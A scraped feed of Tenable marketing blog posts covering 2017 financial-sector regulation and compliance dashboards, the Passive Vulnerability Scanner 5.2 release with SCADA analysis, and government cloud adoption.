New regulations are something most banks will have to face in 2017. For example, in the U.S., a labor department financial-advice rule that goes into effect in April of 2017 will change the way customers interact with Wealth Management Advisors. This regulation is an attempt to provide greater fee transparency between financial planners and those saving for retirement. To the financial companies, this regulation will change the way they do business from an organization-back-end. This regulation also introduces new risks to companies that do not properly communicate to existing and future customers.

As a result, U.S. financial institutions with Wealth Management Advisors will have to implement new IT infrastructures, which could result in new information silos.

Turning to the EU, the recent adoption of a cybersecurity regulation called the General Data Protection Regulation (GDPR) addressing the export of personal data outside the EU will take effect in early 2018. That will have a big effect on how international banks operate:

Financial institutions and service providers to the financial industry process a vast amount of personal data on a daily basis. Much of the data processed is confidential and sensitive. This means there are increased risks and a likelihood of a focus on this sector by supervisory authorities, which will have new rights to audit and to impose administrative fines. Indeed, the GDPR allows for administrative fines which can amount to a maximum of 20 million euros or 4 percent of the global annual turnover of a company. – Financier Worldwide

Facing a fine of 20 million euros or four percent of revenue is a big risk banks will have to stay clear of in 2017.

Solutions for 2017

All three challenges facing the finance sector share a common denominator: transparency. These challenges require that Security Operation Centers, IT security personnel and IT leaders have access to real-time data transparency concerning the status of their networks and level of insider threats.

All three challenges facing the finance sector share a common denominator: transparency

Continuous active scanning, passive detection, log analysis, vulnerability management and compliance testing across the complete organization are critical to crossing the three big hurdles facing this industry in 2017.

Tenable products can assist organizations in meeting these challenges. SecurityCenter Continuous View® (SecurityCenter CV™) provides a real-time, holistic view of all IT assets, network activity and device events that helps you locate exploits and address vulnerabilities quickly. The SecurityCenter highly customizable dashboards also help support compliance testing across an organization.

These customizable dashboards can be fine-tuned to deliver targeted analyses of cybersecurity risks. For example:

  • The Monetary Authority of Singapore (MAS) published new Technology Risk Management (TRM) Guidelines in June 2013. As a result, Tenable developed the MAS TRM Guidelines dashboard, which provides a high-level overview of information relevant to specific sections in the TRM Guidelines.
  • The GLBA Malicious Code Prevention dashboard tracks compliance with the Gramm-Leach-Biley Act (GLBA) that protects the private information of individuals.
  • The SEC Risk Alert dashboard presents data to assist in the evaluation of an organization’s cybersecurity preparedness, as defined by the U.S. Securities and Exchange Commission.

SEC Risk Alert Dashboard in SecurityCenter

These are just a few of the many detailed SecurityCenter dashboards that can help combat the major challenges facing security and IT professionals in the financial services.

Armed with the right tools, the future for finance in 2017 is brighter than it has been in many years.

The finance sector may be no stranger to adversity, but with Tenable solutions, financial organizations can detect emerging threats and perform the real-time discovery of resources necessary to protect their networks and surpass compliance standards. Armed with the right tools, the future for finance in 2017 is brighter than it has been in many years.

Improved SCADA Visibility and Reporting with PVS 5.2

$
0
0

At Tenable, our goal is to provide solutions that enable our customers to secure their organizations and improve visibility into their security posture. As part of this commitment, we are pleased to announce the release of Passive Vulnerability Scanner® (PVS™) 5.2, which includes a new SCADA (Supervisory Control And Data Acquisition) analysis module as well as additional enhancements and improvements to provide a deeper understanding of your environment.

Deep visibility into SCADA assets discoverable by PVS

PVS 5.2 includes a new analysis module that analyzes SCADA network traffic to discover SCADA assets and their vulnerabilities. This module provides the same capabilities as SCADA plugins that are used by PVS versions older than 5.2, with an improvement in performance. The module also provides deep visibility into the type of SCADA devices discovered.

We have also added several new SCADA Top-N charts to the dashboard in PVS to provide a high-level summary of SCADA assets, their vulnerabilities, and protocols used by those assets. These include:

  • SCADA Vulnerability Distribution by Severity
  • Top 10 SCADA Hosts
  • SCADA Host Distribution by Protocol
  • SCADA Host Distribution by System Type

Once enabled, these dashboard charts focus directly on SCADA assets to provide a deeper visibility into your SCADA environment:

PVS SCADA dashboardsPVS SCADA Host Distribution

Improved visibility into network connections

The connection reporting features of the Tenable Network Monitor (TNM) are now available within PVS 5.2 as part of a new Connection Analysis Module. This module eliminates the need for TNM to obtain connection duration and bandwidth information, and extends the platform support to all platforms supported by PVS. Connection duration and bandwidth reporting for IPv6 and tunneled traffic is a new addition and is also available within this module.

Connection analysis event trending

Additional enhancements

Other enhancements in PVS 5.2 include improved performance in 10Gbps network traffic analysis, improved support for reporting on hosts within a VLAN, and support for additional versions of OS X.

More information

For more detailed information about the enhancements, improvements, and benefits of PVS 5.2, please see our PVS 5.2 Release Notes and the PVS 5.2 User Guide.

Clearing a Path to the Cloud for Government Agencies

$
0
0

The U.S. government is committed to cloud computing and steps are being taken by Congress to make the necessary funding available. But there are practical challenges that remain in creating a clear path to the cloud. Tenable is working to help clear that path.

Cloud computing promises economy, flexibility and scalability. In 2017, the U.S. government plans to accelerate its use of the cloud to take advantage of these benefits.

Agencies must have confidence in the security and reliability of cloud computing, and have a practical acquisition strategy

Despite the benefits of cloud computing, cloud adoption by federal agencies has been slow. To speed things along, Congress is considering legislation that would establish IT modernization funds for agencies. But there are challenges other than money in moving to the cloud. Agencies must also have confidence in the security and reliability of cloud computing, and have a practical acquisition strategy for these services.

Companies such as Tenable are working with government agencies to address these challenges and provide a clear path to the cloud, developing products to help with the accreditation and secure operation of cloud offerings.

It’s more than just money

One of the touted advantages of the cloud is ease of adoption. Offered as a service, cloud computing does not require large capital expenditures. But there still are costs in moving to the cloud. Existing platforms must be operated while new ones are being developed, and legacy systems must remain available until the new platform is proven. The Modernizing Government Technology Act (MGT Act) would create pools of money for agencies that could be used for cloud adoption. Money would be paid back to these revolving funds from savings realized from the cloud and by retiring legacy systems that now consume more than 70 percent of the federal IT budget.

Even with money in hand, agencies will be cautious about moving IT resources. They must gain confidence in the cloud’s ability to support mission-critical operations and protect sensitive information.

Achieving the necessary confidence and level of comfort is not a simple matter. Each agency has a different mission and different needs. Within each agency, there are a variety of operations and data with differing levels of sensitivity, requiring different levels of security. Moving everything at once is impractical and unnecessary. Each agency will make its own decisions about what to move first; which assets to trust to the cloud, and which will remain on-prem.

Accrediting and acquiring cloud services remains a long and arduous process

Acquisition is a separate issue. Despite programs intended to ease the pain, accrediting and acquiring cloud services and assuring their continued security remains a long and arduous process.

A hybrid solution

A hybrid cloud environment can help in establishing the necessary level of comfort with cloud computing. This allows an agency to move public-facing and other non-critical operations and data to a service provider’s cloud, while retaining mission-critical data in-house. Interconnecting the platforms enables operations as a single enterprise. Assets can be moved in and out of the cloud as the level of comfort and circumstances dictate.

Achieving the necessary confidence and level of comfort is not a simple matter ... A hybrid cloud environment can help

Building confidence in the cloud and enabling rational acquisition of services requires visibility and continuous monitoring of activity on networks and systems. Agencies can be sure of the security of assets in the cloud, and service offerings can be more efficiently assessed and accredited.

Industry assistance

Tenable understands the challenges of cloud adoption and is addressing these concerns to facilitate the transition to cloud computing. Enabling agencies to continuously monitor, analyze and manage vulnerabilities in this environment; providing hybrid environments for both cloud-based and on-prem security solutions; and customizing security controls for each agency helps to create a clear path to the cloud for agencies.

To learn more about Tenable cloud solutions, contact federal@tenable.com.

Viewing all 1976 articles
Browse latest View live